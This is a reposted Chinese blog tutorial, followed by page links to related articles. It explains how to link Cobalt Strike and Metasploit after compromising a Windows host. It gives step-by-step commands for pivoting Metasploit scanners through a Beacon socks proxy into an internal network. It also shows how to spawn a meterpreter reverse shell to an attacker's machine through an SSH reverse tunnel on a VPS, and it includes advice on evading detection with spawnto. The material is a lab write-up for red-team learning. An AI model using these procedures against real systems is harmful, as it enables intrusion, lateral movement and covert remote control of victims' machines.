kali启动cobaltstrike_Cobalt Strike & MetaSploit 联动

最新推荐文章于 2024-04-03 15:48:05 发布
最新推荐文章于 2024-04-03 15:48:05 发布
阅读量1k 收藏 3
点赞数
文章标签: kali启动cobaltstrike

转载: IRT 工控安全红队

0x01 准备工作

  • 受害主机:在关闭 Windows Defender 和其他一切杀软的前提下,在 Win 10 主机下进行的实验。
  • MSF:本地 kali
  • Cobalt Strike 团队服务器:Ubuntu VPS
  • Cobalt Strike:3.14

团队服务器:

3fb42cecdc8277fd4f3d892f51cdeab8.png

客户端:

d0d3196b1bebfe96d7f5e6645281c1fd.png

上线过程:

因为我关闭了一切杀软及 Windows Defender,自不必做免杀。

fecdeedf24c18140aca428d99cafc837.png
51da5d585cec047b70cde15a967d8812.png
66c1bc626b29c2c61e5cd97eeb883a44.png

一些朋友搞不清楚 Windows Executable 和 Windows Executable (s) 的区别。据官方文档说,Windows Executable 是生成一个 stager,但是 Windows Executable (s) 是 stageless 的,相当于直接生成一个 stage。这个涉及一个分阶段传送 payload 的概念,不做过多解释。我认为选 Windows Executable (s) 比较好,因为 payload stager 因其体积原因,没有一些内建的安全特性。所以能不分阶段就不分阶段。

然后就点击上线。

fc7ccb60ff76181fa7c1c7004ca8929a.png

点击上线之后,可以做一些基本的配置。如设置「抖动因子」或者启动「交互式模式」。

这两个概念官方手册有写,以下部分摘自 cs 官方文档,我翻译了一下:

请注意,Beacon 是一个异步的 payload。命令不会立即执行。每个命令都会先进入队列。当 Beacon 连接到你的时候。它会下载这些命令并挨个执行它们。此时,Beacon 会将所有的输出报告给你。如果输入有误,使用 clear 命令来清理当前 Beacon 的命令队列。 默认情况下,Beacon 每60秒连接到你一次。你可以使用 Beacon 的 sleep 命令修改这个时间设置。使用 sleep 接着一个秒数来指定 Beacon 连接到你的频率。你也可以指定第二个参数,这个参数必须是一个0到99之间的数字。这个数字就是抖动因子。Beacon 会根据你指定的抖动因子的百分比随机变化下次连接到你的时间。比如,sleep 300 20这条命令,会使得 Beacon 睡眠 300秒,另外有 20% 的抖动因子。这意味着 Beacon 在每次连接到你之后会随机睡眠 240 - 300秒。 要使得 Beacon 每秒都多次连接到你,使用 sleep 0 命令。这就是「交互式模式」。这种模式下命令会立即执行。在你的隧道流量通过它之前你必须使得你的 Beacon 处于交互模式下。一些 Beacon 命令(如 browerpivot、desktop等)会自动的使 Beacon 在下次连接到你时处于交互式模式下。

在这里我设置为交互式模式好了:

41310fea72420dcddbce13f1614791fd.png

0x02 通过 beacon 内置的 socks 功能将本地 Msf 直接代入目标内网进行操作

准备工作说的有点事无巨细,相信这些大家也都会。然后就开始做 CS 和 MSF 的联动。

为什么需要 CS 和 MSF 的联动呢?主要是两个框架的侧重点不一样,尽管我们有了 Beacon,但是我们有时候还需要借助 MSF 的 scanner、exploit 这些功能模块,而 CS 更侧重后渗透、团队合作一些。

MSF 就是本地 Kali 自带的 msf5:

a35fdf64d7ddd7558fc7fd2376f4c283.png

首先,到已控目标内网机器的 Beacon 下把 socks 起起来:

beacon> getuidbeacon> socks 1080
808618bb6b80524e679da94ce5973c08.png

然后,通过 View → Proxy Pivots,复制生成的 MSF 代理链接。

494525247c291f816dd626577068f97d.png
664d3e49eb5a52eb1bbf1691d95bd24d.png

本地启动 MSF,挂着上面生成的代理链接,即可直接对目标内网进行各种探测:

    msf > setg Proxies socks4:1xx.1xx.57.70:1080    意思就是让本地的 msf 走上面 cs 的 socks 代理    msf > setg ReverseAllowProxy true               建双向通道    msf > use auxiliary/scanner/smb/smb_version     拿着 msf 中的各类探测模块对目标内网进行正常探测即可,比如,识别目标内网所有 Windows 机器的详细系统版本,机器名和所在域    msf > set rhosts 192.168.56.0/24                指定 CIDR 格式的目标内网段,掩码可根据实际情况给的大一点,比如,0/20,0/16...    msf > set threads 1                             线程不宜给的太大,可根据目标实际情况,控制在10以内    msf > run
5729d64f5dc66b266d60034b29b52e56.png

根据实际情况增强或削弱掩码,从缩小或扩大扫描的子网范围。

总之,这种方法是你先有一个 CS Beacon shell,然后通过 socks 代理,把受害主机的流量代理到本地的 msf,然后本地 msf 就可以进行一些内网探测或漏洞利用。

0x03 尝试借助 CS 的外部 tcp 监听器通过 ssh 隧道直接派生一个 meterpreter 的 shell 到本地

铺垫知识:

铺垫知识很长,但只有先了解铺垫知识,后面的操作才会更好理解。

1、 CS Foreign Listener在这里要借助 CS 的 Foreign 监听器。如图是 CS 3.14 的监听器截图(CS 4.0的监听器类别有了较大改变):

1be40226839e64f8e080142579b91912.png

以下内容引自 cs 官方文档,我做了一下翻译:

其中,Foreign 监听器支持与其他软件的监听器进行派生(spawn),如 msf 的 multi/handler。 将监听器设置为 foreign 并指定主机和端口后可以将 Cobalt Strike 的 payload 生成的会话转移到 msf 中。

2、 CS 通讯模型

首先要明确的一点是,所谓 CS+MSF 的联动,用大白话来说就是流量转发。

流量转发是 CS 与 MSF 之间的事情,与受害主机的 Beacon 无关。完全是 CS 服务器与 MSF 服务器这二者之间的流量转发。

因为 CS 是 C/S 架构的,那么就牵扯出一个问题:CS 转发流量到 MSF(或相反的方向),流量是 MSF 和 CS 客户端直连呢?还是走的 CS 的团队服务器进行转发呢?

这个就会涉及到 CS 的通讯模型:

85c0731fc7e904c52dc09ab19c6af3f7.png

上图来自 Klion 的文章,是我们的客户端与团队服务器的通讯模型。

以下内容来自 cs 官方手册,本人做了微小的翻译工作:

Cobalt Strike 采取措施保护 Beacon 的通信,确保 Beacon 只能接收来自其团队服务器的任务并且只能将结果发送至其团队服务器。 首次设置 Beacon payload 时,Cobalt Strike 会生成一个团队服务器专有的公钥/私钥对。团队服务器的公钥会嵌入 Beacon 的 payload stage。Beacon 使用团队服务器的公钥来加密发送到团队服务器的会话元数据。 Beacon 必须在团队服务器可以发出和接收来自 Beacon 会话的输出之前持续发送会话元数据。此元数据包含一个由 Beacon 生成的随机会话秘钥。团队服务器使用每个 Beacon 的会话秘钥来加密任务并解密输出。 每个 Beacon 都使用此相同的方案来实现数据通道。当在混合 HTTP 和 DNS Beacon 中使用记录数据通道时,有和使用 HTTPS Beacon 同样的安全保护。 请注意,当 Beacon 分阶段时, payload stager 因为其体积原因,没有这些内建的安全特性。

监听器是 Cobalt Strike 与 bot 之间进行通讯的核心模块。同时是 payload 的配置信息以及告诉 Cobalt Strike 服务器以从 payload 收连接指令。其实是位于 payload 配置上一层的抽象概念。 监听器由用户定义的名称、payload 类型、主机、端口及其他信息组成,用于定义 payload 的存放位置。

虽然这些话说的很抽象,但是总之概括其意思,就是说:

CS 的通讯模型中,客户端不会直接与 payload 进行连接,都是必须经过团队服务器的。以团队服务器为中介,这是 CS 设计的一种的安全机制。

所以对于此问题:

CS 转发流量到 MSF(或相反的方向),流量是 MSF 和 CS 客户端直连呢?还是走的 CS 的团队服务器进行转发呢?

答案应该是:CS 与 MSF 之间的流量转发,其实是 CS 团队服务器与 MSF 之间的流量转发。客户端作为第三方只是与 CS 团队服务器进行交互。

这样就清楚多了,确定了流量转发的双方对象为:

  • CS 团队服务器(后文简称 TS)
  • MSF 服务器

那么根据实际情况的网络环境就会有如下这些可能的场景(CS团队服务器一般不会开在本地):

  1. CS TS 在公网、MSF 在本地
  2. CS TS 在公网、MSF 在公网

MSF 在公网的情况比 MSF 在本地的情况相对更好转发一些。因为如果 MSF 在本地,没有公网 IP 地址,要想把 CS TS 的流量发到 MSF,就需要额外的处理。

3、 Spawn

下面是 cs 官方手册中关于 spawn 的介绍,我同样做了一点微小的翻译工作:

Cobalt Strike 的 Beacon 最初是一个稳定的生命线,让你可以保持对受害主机的访问权限。从一开始,Beacon 的主要目的就是向其他的 Cobalt Strike 监听器传递权限。 使用 spawn 命令来为一个监听器派生一个会话。此 spawn 命令接受一个结构(如:x86,x64)和一个监听器作为其参数。 默认情况下,spawn 命令会在 rundll32.exe 中派生一个会话。管理员通过查看告警可能会发现 rundll32.exe 定期与 Internet 建立连接这种异常现象。为了更好的隐蔽性,你可以找到更合适的程序(如 Internet Explorer) 并使用 spawnto 命令来说明在派生新会话时候会使用 Beacon 中的哪个程序。

注:拓展阅读——DllMain与rundll32详解,倾旋的博客,倾旋,2019年10月2日

个人理解,实际上就是这种过程:

e40ad0cbc4615a778e71ddec50de16b0.png

当你对某个 Beacon 选择了 spawn,就是派生,之后会让你选择一个 Listener:

c5a6d1fe9e88f68e6609d4b71efc78a4.png

Listener 就是位于 payload 配置上一层的抽象概念,也就是告诉 CS 团队服务器从 payload 收连接指令的地方,定义了 payload 的存放位置。

通过对某个 Beacon 指定 Listener 进行派生,我们生成了新的会话。这个意思就是让受害主机的 rundll32.exe 这个程序定期与我们指定在这个 Listener 中的地址、端口进行连接,进行指令的收发。

顺便多说一句,在 CS 中,将 payload 注入到内存中的命令除了 spawn,还有 inject。

具体操作:

理解了前面的铺垫知识,下面的操作就很好理解了。

第一步:在本地 MSF上创建监听器

到本地机器把 msf 起起来,并创建如下监听器:

    msf > use exploit/multi/handler     msf > set payload windows/meterpreter/reverse_tcp 注: 此处的协议格式务必要和上面 cs 外部监听器的协议对应,不然 meter 是无法正常回连的     msf > set lhost 192.168.113.131                   注:这里填本地 MSF 服务器的 IP 地址    msf > set lport 8080     msf > exploit
abb8e865e7bde77a67c8f4900f73c3d7.png
5673cf9dc8edb58959db7060a4f87b8d.png

这样就在本地 MSF 上创建了一个监听器。

第二步:给本地 MSF 一个公网地址

这里通过 SSH 隧道转发:

在一台公网 VPS 上编辑 sshd 配置,开启 ssh 转发功能,重启 ssh 服务,这是所有使用 ssh 隧道转发前的必备操作:

    # vi /etc/ssh/sshd_config     AllowTcpForwarding yes     GatewayPorts yes     TCPKeepAlive yes     PasswordAuthentication yes     # systemctl restart sshd.service

再次回到自己本地的 Kali 中并通过 ssh 隧道做好如下转发:

# ssh -C -f -N -g -R 0.0.0.0:8080:192.168.113.131:8080 root@x.x.57.70 -p 27035
94b165973e28478ea9c4e5f23673786f.png

上面命令的意思就:

1. 通过 x.x.57.70 这台机器把来自外部的 8080 端口流量全部转到我本地 192.168.113.131 的 8080 端口上;2. 而本地 192.168.113.131 的 8080 端口上跑的又正好是 meterpreter 的监听器;3. 所以,最终才会造成 meterpreter 本地上线的效果。

隧道建立之后,习惯性的到 vps 上去看一眼,刚才通过隧道监听的 8080 端口到底有没有起来,确实起起来了才说明隧道才是通的。另外,监听的端口不能和 vps 机器上的现有端口冲突,否则隧道是建不成功的。

# netstat -tulnp | grep '8080'
22dc11ee9bf0bb2b5e35913c167f2ad4.png

如图就是建立成功了。

第三步:在 CS 上创建外部监听器

在 cs 上创建一个 tcp 的 foreign listener,回连端口设为 8080:

TCP 就可以,如果是 HTTP 或 HTTPS,最好用域名而不是 IP。

6fec29989956420b95ebdb85bab51ba2.png

这里的 MSF 的公网地址,就是第二步中通过 SSH 隧道转发到的 VPS 的公网地址。

之所以要生成这个外部监听器,是因为后面我们要使用 spawn 命令,把会话转移到 MSF 的服务器上。listener 是 spawn 命令的参数。

如果我们的 MSF 是跑在公网服务器上的话,就可以省去第二步中 SSH 隧道从公网 VPS 转发流量到本地的那步操作。

注:我看到在一些文章中,还会加一个监听器,用于监听团队服务器。可能是因为以为只能有一个会话,但是经本人测试,会话 spawn 到 msf 上之后,本地 CS 客户端依然可以操作。所以就不必多开一个对 CS TS 的监听器了。

第四步:spawn

派生会话的操作很简单:

对 Beacon 选择 spawn 选项(或在 Beacon shell 命令行里面输入 spawn):

5b0b9dde70c871a3829e55383c282f3a.png

为其选择 MSF 的 listener 作为参数:

a7c7c58341a8e23049ebacaad8b4c1de.png

回到本地 MSF,就会发现相应目标机器的 meterpreter 已经被直接弹回到了本地:

1018ff6cb19d8631b04000802a42ec6c.png

总之,我们完成了这样一个操作,从而实现了从 CS Beacon 到本地 MSF meterpreter 的派生:

75a34b832f2f2506095313916a3228c7.png

最后,To be honest,这个问题我也遇到了:

cf0f3a780c91aaada1de5ef1155fa2de.png

如何去解决这个问题,是否 MSF 开在公网就能改善此情况,我还没有试过。在未来的日子里,我会努力探索出更稳定的解决方案。

82897a297f2c4b4e2936363607300876.png

拓展阅读:

[1] DllMain与rundll32详解,倾旋的博客,倾旋,2019年10月2日

参考文档:

[1] CobaltStrike + Metasploit 实战联动利用 [ 一 ] ,Klion,2019年6月[2] csmannual 4.0,https://www.cobaltstrike.com/downloads/csmanual40.pdf[3] 感谢 UD94、because we can 等朋友的帮助

------

本文转载自:Snowming04's Blog

weixin_39626162
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
kali2020.4 linux 安装cobaltstrike4.2.docx
05-03
安装 cobaltstrike4.2
KaliCobalt Strike4.4的安装
m0_61506558的博客
09-04 1万+
Clbalt Strike简称CS,用于团队作战使用,由一个服务端和多个客户端组成,能够让多个攻击者在一个团队服务器上共享资源和信息
Cobalt Strike渗透神器详解,【高级网络安全架构师系统学习
最新发布
2301_76223496的博客
04-03 813
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
Cobalt Strike(CS)介绍,安装及初步使用(学习笔记1)
m0_63239459的博客
03-05 3254
Cobalt Strike工具学习(新手级教程)
黑客必备利器:如何在系统上安装和使用 CobaltStrike(简称:CS)
热门推荐
weixin_43263566的博客
01-11 1万+
渗透测试之基本的攻击流程
浏览器打开出现证书错误_【操作】Cobalt Strike 浏览器跳板攻击
weixin_39977136的博客
11-17 727
0x01 概念介绍浏览器跳板攻击(Browser Pivoting)是一个应用层的跳板技术。设想一个场景:攻击者获取了目标机器的 Beacon shell,然后通过 Cobalt Strike 的 screenshot 工具进行截屏,看到受害机上的终端用户正在与 web 应用程序进行交互,比如登陆了在线邮箱,正在邮箱应用的网页版客户端查看邮件。这种应用对于实现后渗透目标具有很高的价值。如...
CobaltStrike4.4.zip
09-15
CobaltStrike4.4
Cobalt Strike4.7最新版
11-03
windows及Linux都可兼容的版本,Cobalt Strike是一由美国安全团队研发的渗透测试工具,拥有多种协议等多种功能。Cobalt Strike还可以调用Mimikatz、Ladon等其他知名工具,因此广受技术安全渗透人员的喜爱。它分为...
Cobalt Strike 4.5
09-21
Cobalt Strike是一款超级好用的渗透测试工具,拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等多种功能。同时,Cobalt Strike还可以调用Mimikatz等其他知名...
cobaltstrike多个版本
12-30
cobaltstrike4.3,cobaltstrike4.4,cobaltstrike4.5三个版本 安装教程以cs4.3为例: 1、xshell上传至kali,解压 unzip cobaltstrike 2、给cs的服务端teamserver和客户端start.sh执行权限 chmod +x teamserver start...
Kali 安装 Cobalt Strike 上线靶机小计
w1304099880的博客
05-15 4482
Kali安装 Cobalt Strike,并上线靶机验证有效性
kali安装cobaltstrike详细教程
Cwillchris的博客
12-30 4208
启动cs的服务端./teamserver 你的ip 密码(密码随便设置一个,待会用于客户端连接)下载cobaltstrike-linux版本,此下载链接提供4.3,4.4,4.5三个版本。给cs的服务端teamserver和客户端start.sh执行权限。进入cobaltstrike目录,ls查看如下。如果出现以下报错,说明jdk有问题。让你校验密码哈希值是否一直,点击是。xshell上传至kali,解压。输入以下内容,点击connect。重新安装jdk解决以上问题。
Cobalt Strike 4.0渗透攻击工具
tlovejr的博客
03-30 4447
前言 前几天在做综合靶场的时候,有一个不太完整的vulntarget-a综合靶场,在这里我用了cs工具那么今天就给大家简单的说一下这个工具 1、工具简介 Cobalt Strike是一款以metasploit为基础的GUI的框架式渗透工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,winexe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等。 Cobalt Strike主要用于团队作战,可
内网渗透神器CobaltStrike之钓鱼攻击(六)
xf555er的博客
11-22 2601
office钓鱼在无需交互、用户无感知的情况下,执行Office文档中内嵌的一段恶意代码,从远控地址中下载并运行恶意可执行程序,例如远控木马或者勒索病毒等。Cobalt Strike office钓鱼主要方法是生成一段vba代码,然后将代码复制到office套件中,当用户启动office自动运行lnk文件是用于指向其他文件的一种文件。这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用。lnk钓鱼主要将图标伪装成正常图标,但是目标会执行shell命令。
内网渗透攻防-cobalt strike全部功能使用2
weixin_46626737的博客
06-30 257
然后复制到要攻击的目标机器上:shell copy C:\\windows\123.exe(以控制机器-上传上的地址) \\database(目标机器域内名称)\C$\\windows\1.exe(目标机器-想要传到的地址)比如拿下了内网机器,是双网卡,既通外网,也通内网,就可以使用代理,右键点击中转,选择listener选项,payload选择tcp,listenhost填写双网卡的内网地址,端口是跳板机器的端口,会话选择这个跳板机的会话。krbtgt的hash密码-通过minikatz来获取。
【渗透工具篇】Cobalt Strike使用教程
weixin_44681307的博客
07-09 1185
这是来自于Cobalt Strike官网的介绍。Cobalt Strike 是威胁模拟软件。使用渗透测试人员可用的最强大的网络攻击套件之一对现代企业执行有针对性的攻击。这不是合规性测试。office宏,译自英文单词Macro。宏是微软公司为其OFFICE软件包设计的一个特殊功能,软件设计者为了让人们在使用软件进行工作时,避免一再地重复相同的动作而设计出来的一种工具,它利用简单的语法,把常用的动作写成宏,当在工作时,就可以直接利用事先编好的宏自动运行,去完成某项特定的任务,而不必再重复相同的动作,目的是让。
内网渗透工具CobaltStrike使用教程详解
qq_50854662的博客
12-15 2278
内网渗透工具CobaltStrike使用教程详解
网络攻防作业——学习使用cobaltStrike
yyy7654321的博客
06-28 829
生成Windows下可执行木马(一个有英语版的图,一个中文版的),放在指定的地方。在放在window系统的电脑中运行软件,在弹出阻止消息的时候点击信任运行。3.利用Cobaltstrike生成攻击后门,并通过“文件托管” 进行网络共享下载该后门,运行后门上线。2.利用Cobaltstrike生成攻击后门,并通过2种网络共享下载该后门,运行后门上线;1.利用Cobaltstrike生成攻击后门,并通过“文件托管” 进行网络共享。实验工具:VMware,edge,cs。1.登录cs,并生成后面放在指定路径。
kali启动Cobalt Strike
07-28
你可以按照以下步骤启动 Cobalt StrikeKali Linux 上: 1. 首先,确保你已经安装了 Kali Linux,并且已经下载了 Cobalt Strike。 2. 打开终端,导航到 Cobalt Strike 的安装目录。 3. 在终端中输入命令 `./...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值